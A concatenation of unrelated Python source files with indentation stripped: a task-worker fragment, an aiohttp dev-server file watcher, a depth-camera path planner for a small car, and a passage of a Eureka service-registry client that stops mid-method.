task = self.tasks.get()
coroutine = getattr(task.node, task.function_name)(**task.args)
self.__incr(task.function_name)
loop.run_until_complete(coroutine)
self.tasks.task_done()
def is_shutdown(self):
out = None
self._key_lock.acquire()
out = self.stop
self._key_lock.release()
return out
def shutdown(self):
self._key_lock.acquire()
self.stop = True
self._key_lock.release()
def __incr(self, function_name):
self._key_lock.acquire()
self._counter[function_name] = self._counter.get(function_name, 0) + 1
self._key_lock.release()
def get_counter(self):
return self._counter
|
watch.py
|
import asyncio
import os
import signal
import sys
from multiprocessing import Process
from aiohttp import ClientSession
from watchgod import awatch
from ..exceptions import AiohttpDevException
from ..logs import rs_dft_logger as logger
from .config import Config
from .serve import WS, serve_main_app, src_reload
class WatchTask:
def __init__(self, path: str, loop: asyncio.AbstractEventLoop):
self._loop = loop
self._app = None
self._task = None
assert path
self.stopper = asyncio.Event(loop=self._loop)
self._awatch = awatch(path, stop_event=self.stopper)
async def start(self, app):
self._app = app
self._task = self._loop.create_task(self._run())
async def _run(self):
raise NotImplementedError()
async def close(self, *args):
if self._task:
self.stopper.set()
async with self._awatch.lock:
if self._task.done():
self._task.result()
self._task.cancel()
class AppTask(WatchTask):
template_files = '.html', '.jinja', '.jinja2'
def __init__(self, config: Config, loop: asyncio.AbstractEventLoop):
self._config = config
self._reloads = 0
self._session = ClientSession(loop=loop)
self._runner = None
super().__init__(self._config.code_directory, loop)
async def _run(self):
try:
self._start_dev_server()
async for changes in self._awatch:
self._reloads += 1
if any(f.endswith('.py') for _, f in changes):
logger.debug('%d changes, restarting server', len(changes))
self._stop_dev_server()
self._start_dev_server()
await self._src_reload_when_live()
elif len(changes) > 1 or any(f.endswith(self.template_files) for _, f in changes):
# reload all pages
await src_reload(self._app)
else:
# a single (non template) file has changed, reload a single file.
await src_reload(self._app, changes.pop()[1])
except Exception as exc:
logger.exception(exc)
await self._session.close()
raise AiohttpDevException('error running dev server')
async def _src_reload_when_live(self, checks=20):
if self._app[WS]:
url = 'http://localhost:{.main_port}/?_checking_alive=1'.format(self._config)
logger.debug('checking app at "%s" is running before prompting reload...', url)
for i in range(checks):
await asyncio.sleep(0.1, loop=self._app.loop)
try:
async with self._session.get(url):
pass
except OSError as e:
logger.debug('try %d | OSError %d app not running', i, e.errno)
else:
logger.debug('try %d | app running, reloading...', i)
await src_reload(self._app)
return
def _start_dev_server(self):
act = 'Start' if self._reloads == 0 else 'Restart'
logger.info('%sing dev server at http://%s:%s ●', act, self._config.host, self._config.main_port)
try:
tty_path = os.ttyname(sys.stdin.fileno())
except OSError: # pragma: no branch
# fileno() always fails with pytest
tty_path = '/dev/tty'
except AttributeError:
# on windows, without a windows machine I've no idea what else to do here
tty_path = None
self._process = Process(target=serve_main_app, args=(self._config, tty_path))
self._process.start()
def _stop_dev_server(self):
if self._process.is_alive():
logger.debug('stopping server process...')
os.kill(self._process.pid, signal.SIGINT)
self._process.join(5)
if self._process.exitcode is None:
logger.warning('process has not terminated, sending SIGKILL')
os.kill(self._process.pid, signal.SIGKILL)
self._process.join(1)
else:
logger.debug('process stopped')
else:
logger.warning('server process already dead, exit code: %s', self._process.exitcode)
async def close(self, *args):
self.stopper.set()
self._stop_dev_server()
await asyncio.gather(super().close(), self._session.close())
class LiveReloadTask(WatchTask):
async def _run(self):
async for changes in self._awatch:
if len(changes) > 1:
await src_reload(self._app)
else:
await src_reload(self._app, changes.pop()[1])
|
pathplanner.py
|
from numpy.linalg import svd, det
import multiprocessing as mp
from module.camera import *
import numpy as np
from threading import Thread
import module.config as conf
class PathFinder:
def __init__(self, car):
self.cam = None
self._car = car
self._camera_offset = self._car.size[2] - self._car.camera_offset[2]
self.verts = None
self.ground_plane = None # self._get_ground_plane()
# Path planning variables
self.theta = 0.0 # steering direction
self.phi = 0.0 # incline angle
self.dist = -1.0 # distance to object
self.t_last_data = 0.0 # last valid data reading
self.samplerate = 0.0
self.fov = conf.FOV # FieldOfView
self.q = mp.Queue() # message queue
self.pp = None
def start(self):
"""
Start path planner as own process
:return: Pathplanner process
"""
self.pp = mp.Process(target=self.run, name='path_planner', args=(self.q,))
try:
self.pp.start()
except Exception as err:
print("Error: unable to start path_planner thread, err: {}".format(err))
return self.pp
def end(self):
"""
end Pathplanner process
:return: process exitcode
"""
self.q.put("END")
if self.pp.is_alive():
self.pp.join(timeout=1)
self.q.close()
self.q.join_thread()
if self.pp.is_alive:
self.pp.terminate()
print('\n\033[91m Path planner terminated\033[0m')
else:
print('\n\033[92m Path planner ended\033[0m')
return self.pp.exitcode
def _rigid_transform_3D(self, A, B):
assert len(A) == len(B)
N = A.shape[0] # total points
centroid_A = np.mean(A, axis=0)
centroid_B = np.mean(B, axis=0)
# centre the points
AA = A - np.tile(centroid_A, (N, 1))
BB = B - np.tile(centroid_B, (N, 1))
# dot is matrix multiplication for array
H = np.transpose(AA) * BB
U, S, Vt = svd(H)
R = Vt.T * U.T
# special reflection case
if det(R) < 0:
Vt[2, :] *= -1
R = Vt.T * U.T
t = -R * centroid_A.T + centroid_B.T
return R, t
def _get_ground_plane(self):
"""
Estimate ground plain using Least square
:return: groudn plain origin and rotation
"""
pos, normal = self._planeFit()
rot, _ = self._rigid_transform_3D(pos, normal)
rot = np.eye(3) # todo calculate rotation matrix
return pos, rot, normal
def _planeFit(self):
"""
Original code from: https://stackoverflow.com/a/18968498
p, n = planeFit(points)
Given an array, points, of shape (d,...)
representing points in d-dimensional space,
fit an d-dimensional plane to the points.
:return: a point, p, on the plane (the point-cloud centroid),
and the normal, n.
"""
verts_t = np.transpose(self.verts)
verts_t = np.reshape(verts_t, (np.shape(verts_t)[0], -1)) # Collapse trialing dimensions
assert verts_t.shape[0] <= verts_t.shape[1], "There are only {} points in {} dimensions.".format(verts_t.shape[1],
verts_t.shape[0])
ctr = verts_t.mean(axis=1)
x = verts_t - ctr[:, np.newaxis]
M = np.dot(x, x.T) # Could also use np.cov(x) here.
return ctr, svd(M)[0][:, -1]
def _process_verts(self, verts, tunnel_size, theta=0.0, phi=0.0):
"""
Process verts from Camera.
:param tunnel_size: the desired tunnel size, [w, h]
:param theta: The desired turning angle
:param phi: The desired incline angle.
:param ground_plane: The estimated driving plane.
:return: All inlier points in defined direction and for the defined tunnel size.
"""
# todo
# driving plane -> phi angle
p = verts
[w, h, l] = tunnel_size
z_lim = l # todo get lim from car size like:
# z_lim = self._camera_offset
X, Y, Z = p[:, 0], p[:, 1], p[:, 2]
# inlier index vector
# I = []
"""
Basic depth filter (Z)
do not allow points within car area.
"""
I = np.where((Z > z_lim))[0]
# if no inliers return None
if not I.any():
return None
"""
Filter height (Y) inliers # todo implement plane filter instead of static height
using the line equation y = kx + m we can formulate the inlier constraint as
-mlim <= m <= mlim for m = y - kx.
In this case we substitute y with the Y-array (Height) and x with the Z - array (Depth).
"""
radPhi = np.deg2rad(phi)
k_y = np.tan(-radPhi) # negate to get correct incline direction
mlim_h = [-h / 2, h / 2]
m = np.subtract(Y[I], np.multiply(k_y, Z[I])) # {m = y - kx} => m = Y - k.*Z
# Inlier indexes
I_y = np.where(np.logical_and(mlim_h[0] <= m, mlim_h[1] >= m))[0]
I = I[I_y]
"""
Filter width (X) inliers
using the same equation as above but now with the m being a function of k,X and Z.
we now only use inliers (I_y) form the above step to reduce necessary computations.
"""
radTheta = np.deg2rad(theta)
k_x = np.tan(radTheta)
mlim_w = [-w / 2, w / 2]
m = np.subtract(X[I], np.multiply(k_x, Z[I])) # {m = y - kx} => m = X - k.*Z
# Inlier of Y inliers
I_x = np.where(np.logical_and(mlim_w[0] <= m, mlim_w[1] >= m))[0]
# Pop outliers from I
I = I[I_x]
return p[I]
def _get_path(self, alpha=conf.PATH_SMOOTHING):
"""
Get distance and heading to longest path
:param alpha: smoothing factor
:return: None
"""
# todo:
# get theta span depending on furthest distance
# weight non-linear path depending on speed
# imp max theta and speed change
theta = None
tunnel_size = self._car.size[0:3] # [w h l_offset]
#self.verts = self.cam.get_verts()
self.ground_plane = self._get_ground_plane()
max_dist = 0 # longest found path distance
n_scan_steps = 15
for _theta in range(int(self.theta - self.fov / 2), int(self.theta + self.fov / 2 + 1), n_scan_steps):
# process verts to get inlier points
inliers = self._process_verts(self.verts, tunnel_size=tunnel_size, theta=_theta, phi=self.phi)
try:
Z = inliers[:, 2]
_dist = np.min(Z)
if _dist >= max_dist * 1.25: # Must be more than 25% longer to change heading
theta = _theta
max_dist = _dist
except:
pass
if theta is not None:
# Smoothing
self.theta = alpha * theta + (1 - alpha) * self.theta
self.dist = min(alpha * max_dist + (1 - alpha) * self.dist, max_dist)
def _image_extraction(self):
"""
Image extraction thread
:return: None
"""
# todo move to thread in Camera class
try:
while True:
shared.raw_image = shared.nparray_to_rawarray(self.cam.get_image())
shared.t_raw_image.value = time.perf_counter()
except Exception as err:
print('Error in image extraction thread: ', err)
def run(self, q):
"""
Main Path planner Process
:param q: message queue
:return: none
"""
rx_msg = tx_msg = []
# Init RealSense camera with threading
self.cam = init_camera()
# If Raw image is requested, start tread for image extraction
if conf.IMAGERAW:
ie = Thread(target=self._image_extraction)
#ie.daemon = True
ie.start()
while True:
# get RX data from queue
# todo
# get verts from camera
self.verts = self.cam.get_verts()
# Get sample rate
_t_now = time.perf_counter()
self.samplerate = 1 / (_t_now - self.t_last_data)
self.t_last_data = _t_now
# Get new path
self._get_path()
# Create TX message
tx_msg = {'dist': self.dist,
'rate': self.samplerate,
'theta': self.theta,
'ground': self.ground_plane,
'last_reading': self.t_last_data}
# Check if END command form RX data else send new TX data
if "END" in rx_msg:
break # End process
elif tx_msg:
q.put(tx_msg) # send data as Queue message
# End process
while not q.empty(): # flush queue
q.get()
time.sleep(0.01)
q.close()
self.cam.end()
print('\n\033[92m Path planner ended\033[0m')
|
eureka_client.py
|
# -*- coding: utf-8 -*-
"""
Copyright (c) 2018 Keijack Wu
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import atexit
import inspect
import json
import random
import re
import socket
import ssl
import time
from threading import RLock, Thread, Timer
from typing import Callable, Dict, List, Union
import py_eureka_client.http_client as http_client
import py_eureka_client.netint_utils as netint
from py_eureka_client import (
application,
constants,
eureka_server_conf,
exceptions,
registry,
util,
)
from py_eureka_client.__aws_info_loader import AmazonInfo
from py_eureka_client.logger import get_logger
_logger = get_logger("eureka_client")
class EurekaClient:
"""
Example:
>>> client = EurekaClient(
eureka_server="http://my_eureka_server_peer_1/eureka/v2,http://my_eureka_server_peer_2/eureka/v2",
app_name="python_module_1",
instance_port=9090)
>>> client.start()
>>> result = client.do_service("APP_NAME", "/context/path", return_type="json")
EIPs support:
You can configure EIP using `eureka_availability_zones` and specify the `zone` of your instance. But please aware, that the client won't fill up the metadata atomatically,
You should put it to the `metadata` when creating the object.
>>> client = EurekaClient(eureka_availability_zones={
"us-east-1c": "http://ec2-552-627-568-165.compute-1.amazonaws.com:7001/eureka/v2/,http://ec2-368-101-182-134.compute-1.amazonaws.com:7001/eureka/v2/",
"us-east-1d": "http://ec2-552-627-568-170.compute-1.amazonaws.com:7001/eureka/v2/",
"us-east-1e": "http://ec2-500-179-285-592.compute-1.amazonaws.com:7001/eureka/v2/"},
zone="us-east-1c",
app_name="python_module_1",
instance_port=9090,
data_center_name="Amazon")
EurekaClient supports DNS discovery feature.
For instance, following is a DNS TXT record created in the DNS server that lists the set of available DNS names for a zone.
>>> txt.us-east-1.mydomaintest.netflix.net="us-east-1c.mydomaintest.netflix.net" "us-east-1d.mydomaintest.netflix.net" "us-east-1e.mydomaintest.netflix.net"
Then, you can define TXT records recursively for each zone similar to the following (if more than one hostname per zone, space delimit)
>>> txt.us-east-1c.mydomaintest.netflix.net="ec2-552-627-568-165.compute-1.amazonaws.com" "ec2-368-101-182-134.compute-1.amazonaws.com"
>>> txt.us-east-1d.mydomaintest.netflix.net="ec2-552-627-568-170.compute-1.amazonaws.com"
>>> txt.us-east-1e.mydomaintest.netflix.net="ec2-500-179-285-592.compute-1.amazonaws.com"
And then you can create the client like:
>>> client = EurekaClient(eureka_domain="mydomaintest.netflix.net",
region="us-east-1",
zone="us-east-1c",
app_name="python_module_1",
instance_port=9090,
data_center_name="Amazon")
Eureka client also supports setting up the protocol, basic authentication and context path of your eureka server.
>>> client = EurekaClient(eureka_domain="mydomaintest.netflix.net",
region="us-east-1",
zone="us-east-1c",
eureka_protocol="https",
eureka_basic_auth_user="keijack",
eureka_basic_auth_password="kjauthpass",
eureka_context="/eureka/v2",
app_name="python_module_1",
instance_port=9090,
data_center_name="Amazon")
or
>>> client = EurekaClient(eureka_server="my_eureka_server_peer_1,my_eureka_server_peer_2",
eureka_protocol="https",
eureka_basic_auth_user="keijack",
eureka_basic_auth_password="kjauthpass",
eureka_context="/eureka/v2",
app_name="python_module_1",
instance_port=9090)
You can use `do_service`, `do_service_async`, `wall_nodes`, `wall_nodes_async` to call the remote services.
>>> res = eureka_client.do_service("OTHER-SERVICE-NAME", "/service/context/path")
>>> def success_callabck(data):
...
def error_callback(error):
...
client.do_service_async("OTHER-SERVICE-NAME", "/service/context/path", on_success=success_callabck, on_error=error_callback)
>>> def walk_using_your_own_urllib(url):
...
res = client.walk_nodes("OTHER-SERVICE-NAME", "/service/context/path", walker=walk_using_your_own_urllib)
>>> client.walk_nodes("OTHER-SERVICE-NAME", "/service/context/path",
walker=walk_using_your_own_urllib,
on_success=success_callabck,
on_error=error_callback)
"""
def __init__(
self,
# The eureka server url, if you want have deploy a cluster to do the failover, use `,` to separate the urls.
eureka_server: str = constants.Constant.DEFAULT_EUREKA_SERVER_URL,
# The domain name when using the DNS discovery.
eureka_domain: str = "",
# The region when using DNS discovery.
region: str = "",
# Which zone your instances belong to, default is `default`.
zone: str = "",
# The zones' url configurations.
eureka_availability_zones: Dict[str, str] = {},
# The protocol of the eureka server, if the url include this part, this protocol will not add to the url.
eureka_protocol: str = "http",
# User name of the basic authentication of the eureka server, if the url include this part, this protocol will not add to the url.
eureka_basic_auth_user: str = "",
# Password of the basic authentication of the eureka server, if the url include this part, this protocol will not add to the url.
eureka_basic_auth_password: str = "",
# The context path of the eureka server, if the url include this part, this protocol will not add to the url, default is `/eureka`
# which meets the spring-boot eureka context but not the Netflix eureka server url.
eureka_context: str = "/eureka",
# When set to True, will first find the eureka server in the same zone to register, and find the instances in the same zone to do
# the service. Or it will randomly choose the eureka server to register and instances to do the services, default is `True`.
prefer_same_zone: bool = True,
# When set to False, will not register this instance to the eureka server, default is `True`.
should_register: bool = True,
# When set to False, will not pull registry from the eureka server, default is `True`.
should_discover: bool = True,
#
on_error: Callable = None,
## The following parameters all the properties of this instances, all this fields will be sent to the eureka server.
# The application name of this instance.
app_name: str = "",
# The id of this instance, if not specified, will generate one by app_name and instance_host/instance_ip and instance_port.
instance_id: str = "",
# The host of this instance.
instance_host: str = "",
# The ip of this instance. If instance_host and instance_ip are not specified, will try to find the ip via connection to the eureka server.
instance_ip: str = "",
# The ip network of this instance. If instance_host and instance_ip are not specified, will try to find the ip from the avaiable network adapters that matches the specified network. For example 192.168.1.0/24.
instance_ip_network: str = "",
# The port of this instance.
instance_port: int = constants.Constant.DEFAULT_INSTANCE_PORT,
# Set whether enable the instance's unsecure port, default is `True`.
instance_unsecure_port_enabled: bool = True,
# The secure port of this instance.
instance_secure_port: int = constants.Constant.DEFAULT_INSTANCE_SECURE_PORT,
# Set whether enable the instance's secure port, default is `False`.
instance_secure_port_enabled: bool = False,
# Accept `Netflix`, `Amazon`, `MyOwn`, default is `MyOwn`
data_center_name: str = constants.Constant.DEFAULT_DATA_CENTER_INFO,
# Will send heartbeat and pull registry in this time interval, defalut is 30 seconds
renewal_interval_in_secs: int = constants.Constant.RENEWAL_INTERVAL_IN_SECS,
# Sets the client specified setting for eviction (e.g. how long to wait without renewal event).
duration_in_secs: int = constants.Constant.DURATION_IN_SECS,
# The home page url of this instance.
home_page_url: str = "",
# The status page url of this instance.
status_page_url: str = "",
# The health check url of this instance.
health_check_url: str = "",
# The secure health check url of this instance.
secure_health_check_url: str = "",
# The virtual ip address of this instance.
vip_adr: str = "",
# The secure virtual ip address of this instance.
secure_vip_addr: str = "",
# Sets a flag if this instance is the same as the discovery server that is
# return the instances. This flag is used by the discovery clients to
# identity the discovery server which is coordinating/returning the
# information.
is_coordinating_discovery_server: bool = False,
# The metadata map of this instances
metadata: Dict = {},
# Will also find the services that belongs to these regions.
remote_regions: List[str] = [],
# Specify the strategy how to choose a instance when there are more than one instanse of an App.
ha_strategy: int = constants.HAStrategy.HA_STRATEGY_RANDOM,
):
assert (
app_name is not None and app_name != "" if should_register else True
), "application name must be specified."
assert instance_port > 0 if should_register else True, "port is unvalid"
assert isinstance(metadata, dict), "metadata must be dict"
assert (
ha_strategy
in (
constants.HAStrategy.HA_STRATEGY_RANDOM,
constants.HAStrategy.HA_STRATEGY_STICK,
constants.HAStrategy.HA_STRATEGY_OTHER,
)
if should_discover
else True
), f"do not support strategy {ha_strategy}"
self.__net_lock = RLock()
self.__eureka_server_conf = eureka_server_conf.EurekaServerConf(
eureka_server=eureka_server,
eureka_domain=eureka_domain,
eureka_protocol=eureka_protocol,
eureka_basic_auth_user=eureka_basic_auth_user,
eureka_basic_auth_password=eureka_basic_auth_password,
eureka_context=eureka_context,
eureka_availability_zones=eureka_availability_zones,
region=region,
zone=zone,
)
self.__cache_eureka_url = {}
self.__should_register = should_register
self.__should_discover = should_discover
self.__prefer_same_zone = prefer_same_zone
self.__alive = False
self.__heartbeat_interval = renewal_interval_in_secs
self.__heartbeat_timer = Timer(renewal_interval_in_secs, self.__heartbeat)
self.__heartbeat_timer.daemon = True
self.__instance_ip = instance_ip
self.__instance_ip_network = instance_ip_network
self.__instance_host = instance_host
self.__aws_metadata = {}
self.__on_error_callback = on_error
# For Registery
if should_register:
if data_center_name == "Amazon":
self.__aws_metadata = self.__load_ec2_metadata_dict()
if self.__instance_host == "" and self.__instance_ip == "":
self.__instance_ip, self.__instance_host = self.__get_ip_host(
self.__instance_ip_network
)
elif self.__instance_host != "" and self.__instance_ip == "":
self.__instance_ip = netint.get_ip_by_host(self.__instance_host)
if not EurekaClient.__is_ip(self.__instance_ip):
def try_to_get_client_ip(url):
self.__instance_ip = EurekaClient.__get_instance_ip(url)
self.__connect_to_eureka_server(try_to_get_client_ip)
elif self.__instance_host == "" and self.__instance_ip != "":
self.__instance_host = netint.get_host_by_ip(self.__instance_ip)
mdata = {"management.port": str(instance_port)}
if zone:
mdata["zone"] = zone
mdata.update(metadata)
ins_id = (
instance_id
if instance_id != ""
else f"{self.__instance_ip}:{app_name.lower()}:{instance_port}"
)
_logger.debug(f"register instance using id [#{ins_id}]")
self.__instance = {
"instanceId": ins_id,
"hostName": self.__instance_host,
"app": app_name.upper(),
"ipAddr": self.__instance_ip,
"port": {
"$": instance_port,
"@enabled": str(instance_unsecure_port_enabled).lower(),
},
"securePort": {
"$": instance_secure_port,
"@enabled": str(instance_secure_port_enabled).lower(),
},
"countryId": 1,
"dataCenterInfo": {
"@class": constants.Constant.AMAZON_DATA_CENTER_INFO_CLASS
if data_center_name == "Amazon"
else constants.Constant.DEFAULT_DATA_CENTER_INFO_CLASS,
"name": data_center_name,
},
"leaseInfo": {
"renewalIntervalInSecs": renewal_interval_in_secs,
"durationInSecs": duration_in_secs,
"registrationTimestamp": 0,
"lastRenewalTimestamp": 0,
"evictionTimestamp": 0,
"serviceUpTimestamp": 0,
},
"metadata": mdata,
"homePageUrl": EurekaClient.__format_url(
home_page_url, self.__instance_host, instance_port
),
"statusPageUrl": EurekaClient.__format_url(
status_page_url, self.__instance_host, instance_port, "info"
),
"healthCheckUrl": EurekaClient.__format_url(
health_check_url, self.__instance_host, instance_port, "health"
),
"secureHealthCheckUrl": secure_health_check_url,
"vipAddress": vip_adr if vip_adr != "" else app_name.lower(),
"secureVipAddress": secure_vip_addr
if secure_vip_addr != ""
else app_name.lower(),
"isCoordinatingDiscoveryServer": str(
is_coordinating_discovery_server
).lower(),
}
if data_center_name == "Amazon":
self.__instance["dataCenterInfo"]["metadata"] = self.__aws_metadata
else:
self.__instance = {}
# For discovery
self.__remote_regions = remote_regions if remote_regions is not None else []
self.__applications: application.Applications
self.__delta: application.Applications
self.__ha_strategy = ha_strategy
self.__ha_cache = {}
self.__application_mth_lock = RLock()
def __get_ip_host(self, network):
ip, host = netint.get_ip_and_host(network)
if (
self.__aws_metadata
and "local-ipv4" in self.__aws_metadata
and self.__aws_metadata["local-ipv4"]
):
ip = self.__aws_metadata["local-ipv4"]
if (
self.__aws_metadata
and "local-hostname" in self.__aws_metadata
and self.__aws_metadata["local-hostname"]
):
host = self.__aws_metadata["local-hostname"]
return ip, host
def __load_ec2_metadata_dict(self):
# instance metadata
amazon_info = AmazonInfo()
mac = amazon_info.get_ec2_metadata("mac")
if mac:
vpc_id = amazon_info.get_ec2_metadata(
f"network/interfaces/macs/{mac}/vpc-id"
)
else:
vpc_id = ""
metadata = {
"instance-id": amazon_info.get_ec2_metadata("instance-id"),
"ami-id": amazon_info.get_ec2_metadata("ami-id"),
"instance-type": amazon_info.get_ec2_metadata("instance-type"),
"local-ipv4": amazon_info.get_ec2_metadata("local-ipv4"),
"local-hostname": amazon_info.get_ec2_metadata("local-hostname"),
"availability-zone": amazon_info.get_ec2_metadata(
"placement/availability-zone", ignore_error=True
),
"public-hostname": amazon_info.get_ec2_metadata(
"public-hostname", ignore_error=True
),
"public-ipv4": amazon_info.get_ec2_metadata(
"public-ipv4", ignore_error=True
),
"mac": mac,
"vpcId": vpc_id,
}
# accountId
doc = amazon_info.get_instance_identity_document()
if doc and "accountId" in doc:
metadata["accountId"] = doc["accountId"]
return metadata
@property
def should_register(self) -> bool:
return self.__should_register
@property
def should_discover(self) -> bool:
return self.__should_discover
@property
def zone(self) -> str:
return self.__eureka_server_conf.zone
@property
def applications(self) -> application.Applications:
if not self.should_discover:
raise exceptions.DiscoverException(
"should_discover set to False, no registry is pulled, cannot find any applications."
)
with self.__application_mth_lock:
if self.__applications is None:
self.__pull_full_registry()
return self.__applications
def __try_eureka_server_in_cache(self, fun):
ok = False
invalid_keys = []
for z, url in self.__cache_eureka_url.items():
try:
_logger.debug(
f"Try to do {fun.__name__} in zone[{z}] using cached url {url}. "
)
fun(url)
except (http_client.HTTPError, http_client.URLError):
_logger.warn(
f"Eureka server [{url}] is down, use next url to try.",
exc_info=True,
)
invalid_keys.append(z)
else:
ok = True
if invalid_keys:
_logger.debug(f"Invalid keys::{invalid_keys} will be removed from cache.")
for z in invalid_keys:
del self.__cache_eureka_url[z]
if not ok:
raise exceptions.EurekaServerConnectionException(
"All eureka servers in cache are down!"
)
def __try_eureka_server_in_zone(self, fun):
self.__try_eureka_servers_in_list(
fun, self.__eureka_server_conf.servers_in_zone, self.zone
)
def __try_eureka_server_not_in_zone(self, fun):
for zone, urls in self.__eureka_server_conf.servers_not_in_zone.items():
try:
self.__try_eureka_servers_in_list(fun, urls, zone)
except exceptions.EurekaServerConnectionException:
_logger.warn(
f"try eureka servers in zone[{zone}] error!", exc_info=True
)
else:
return
raise exceptions.EurekaServerConnectionException(
"All eureka servers in all zone are down!"
)
def __try_eureka_server_regardless_zones(self, fun):
for zone, urls in self.__eureka_server_conf.servers.items():
try:
self.__try_eureka_servers_in_list(fun, urls, zone)
except exceptions.EurekaServerConnectionException:
_logger.warn(
f"try eureka servers in zone[{zone}] error!", exc_info=True
)
else:
return
raise exceptions.EurekaServerConnectionException(
"All eureka servers in all zone are down!"
)
def __try_all_eureka_servers(self, fun):
if self.__prefer_same_zone:
try:
self.__try_eureka_server_in_zone(fun)
except exceptions.EurekaServerConnectionException:
self.__try_eureka_server_not_in_zone(fun)
else:
self.__try_eureka_server_regardless_zones(fun)
def __try_eureka_servers_in_list(
self, fun, eureka_servers=[], zone=constants.Constant.DEFAULT_ZONE
):
with self.__net_lock:
ok = False
_zone = zone if zone else constants.Constant.DEFAULT_ZONE
for url in eureka_servers:
url = url.strip()
try:
_logger.debug(
f"try to do {fun.__name__} in zone[{_zone}] using url {url}. "
)
fun(url)
except (http_client.HTTPError, http_client.URLError):
_logger.warn(
f"Eureka server [{url}] is down, use next url to try.",
exc_info=True,
)
else:
ok = True
self.__cache_eureka_url[_zone] = url
break
if not ok:
if _zone in self.__cache_eureka_url:
del self.__cache_eureka_url[_zone]
raise exceptions.EurekaServerConnectionException(
f"All eureka servers in zone[{_zone}] are down!"
)
def __connect_to_eureka_server(self, fun):
if self.__cache_eureka_url:
try:
self.__try_eureka_server_in_cache(fun)
except exceptions.EurekaServerConnectionException:
self.__try_all_eureka_servers(fun)
else:
self.__try_all_eureka_servers(fun)
@staticmethod
def __format_url(url, host, port, defalut_ctx=""):
if url != "":
if url.startswith("http"):
_url = url
elif url.startswith("/"):
_url = f"http://{host}:{port}{url}"
else:
_url = f"http://{host}:{port}/{url}"
else:
_url = f"http://{host}:{port}/{defalut_ctx}"
return _url
@staticmethod
def __is_ip(ip_str):
return re.match(r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$", ip_str)
@staticmethod
def __get_instance_ip(eureka_server):
url_obj = http_client.parse_url(eureka_server)
target_ip = url_obj["host"]
target_port = url_obj["port"]
if target_port is None:
if url_obj["schema"] == "http":
target_port = 80
else:
target_port = 443
if url_obj["ipv6"] is not None:
target_ip = url_obj["ipv6"]
socket_family = socket.AF_INET6
else:
socket_family = socket.AF_INET
s = socket.socket(socket_family, socket.SOCK_DGRAM)
s.connect((target_ip, target_port))
ip = s.getsockname()[0]
s.close()
return ip
def _on_error(self, error_type: str, exception: Exception):
if self.__on_error_callback and callable(self.__on_error_callback):
self.__on_error_callback(error_type, exception)
def register(
self,
status: str = constants.InstanceStatus.INSTANCE_STATUS_UP,
overriddenstatus: str = constants.InstanceStatus.INSTANCE_STATUS_UNKNOWN,
) -> None:
self.__instance["status"] = status
self.__instance["overriddenstatus"] = overriddenstatus
self.__instance["lastUpdatedTimestamp"] = str(util.current_time_millis())
self.__instance["lastDirtyTimestamp"] = str(util.current_time_millis())
try:
def do_register(url):
registry.send_registry(url, self.__instance)
self.__connect_to_eureka_server(do_register)
except Exception as e:
self.__alive = False
_logger.warn("Register error! Will try in next heartbeat. ", exc_info=True)
self._on_error(constants.ErrorTypes.ERROR_REGISTER, e)
else:
_logger.debug("register successfully!")
self.__alive = True
def cancel(self) -> None:
try:
def do_cancel(url):
registry.cancel(
url, self.__instance["app"], self.__instance["instanceId"]
)
self.__connect_to_eureka_server(do_cancel)
except Exception as e:
_logger.warn("Cancel error!", exc_info=True)
self._on_error(constants.ErrorTypes.ERROR_STATUS_UPDATE, e)
else:
self.__alive = False
def send_heartbeat(self, overridden_status: str = "") -> None:
if not self.__alive:
self.register()
return
try:
_logger.debug("sending heartbeat to eureka server. ")
def do_send_heartbeat(url):
registry.send_heartbeat(
url,
self.__instance["app"],
self.__instance["instanceId"],
self.__instance["lastDirtyTimestamp"],
status=self.__instance["status"],
overriddenstatus=overridden_status,
)
self.__connect_to_eureka_server(do_send_heartbeat)
except Exception as e:
_logger.warn(
"Cannot send heartbeat to server, try to register. ", exc_info=True
)
self._on_error(constants.ErrorTypes.ERROR_STATUS_UPDATE, e)
self.register()
def status_update(self, new_status: str) -> None:
self.__instance["status"] = new_status
try:
def do_status_update(url):
registry.status_update(
url,
self.__instance["app"],
self.__instance["instanceId"],
self.__instance["lastDirtyTimestamp"],
new_status,
)
self.__connect_to_eureka_server(do_status_update)
except Exception as e:
_logger.warn("update status error!", exc_info=True)
self._on_error(constants.ErrorTypes.ERROR_STATUS_UPDATE, e)
def delete_status_override(self) -> None:
try:
self.__connect_to_eureka_server(
lambda url: registry.delete_status_override(
url,
self.__instance["app"],
self.__instance["instanceId"],
self.__instance["lastDirtyTimestamp"],
)
)
except Exception as e:
_logger.warn("delete status overrid error!", exc_info=True)
self._on_error(constants.ErrorTypes.ERROR_STATUS_UPDATE, e)
def __start_register(self):
_logger.debug("start to registry client...")
self.register()
def __stop_registery(self):
if self.__alive:
self.register(status=constants.InstanceStatus.INSTANCE_STATUS_DOWN)
self.cancel()
def __heartbeat(self):
while True:
if self.__should_register:
_logger.debug("sending heartbeat to eureka server ")
self.send_heartbeat()
if self.__should_discover:
_logger.debug("loading services from eureka server")
self.__fetch_delta()
time.sleep(self.__heartbeat_interval)
def __pull_full_registry(self):
def do_pull(url): # the actual function body
self.__applications = util.get_applications(url, self.__remote_regions)
self.__delta = self.__applications
try:
self.__connect_to_eureka_server(do_pull)
except Exception as e:
_logger.warn("pull full registry from eureka server error!", exc_info=True)
self._on_error(constants.ErrorTypes.ERROR_DISCOVER, e)
def __fetch_delta(self):
def do_fetch(url):
if (
self.__applications is None
or len(self.__applications.applications) == 0
):
self.__pull_full_registry()
return
delta = util.get_delta(url, self.__remote_regions)
_logger.debug(f"delta got: v.{delta.versionsDelta}::{delta.appsHashcode}")
if (
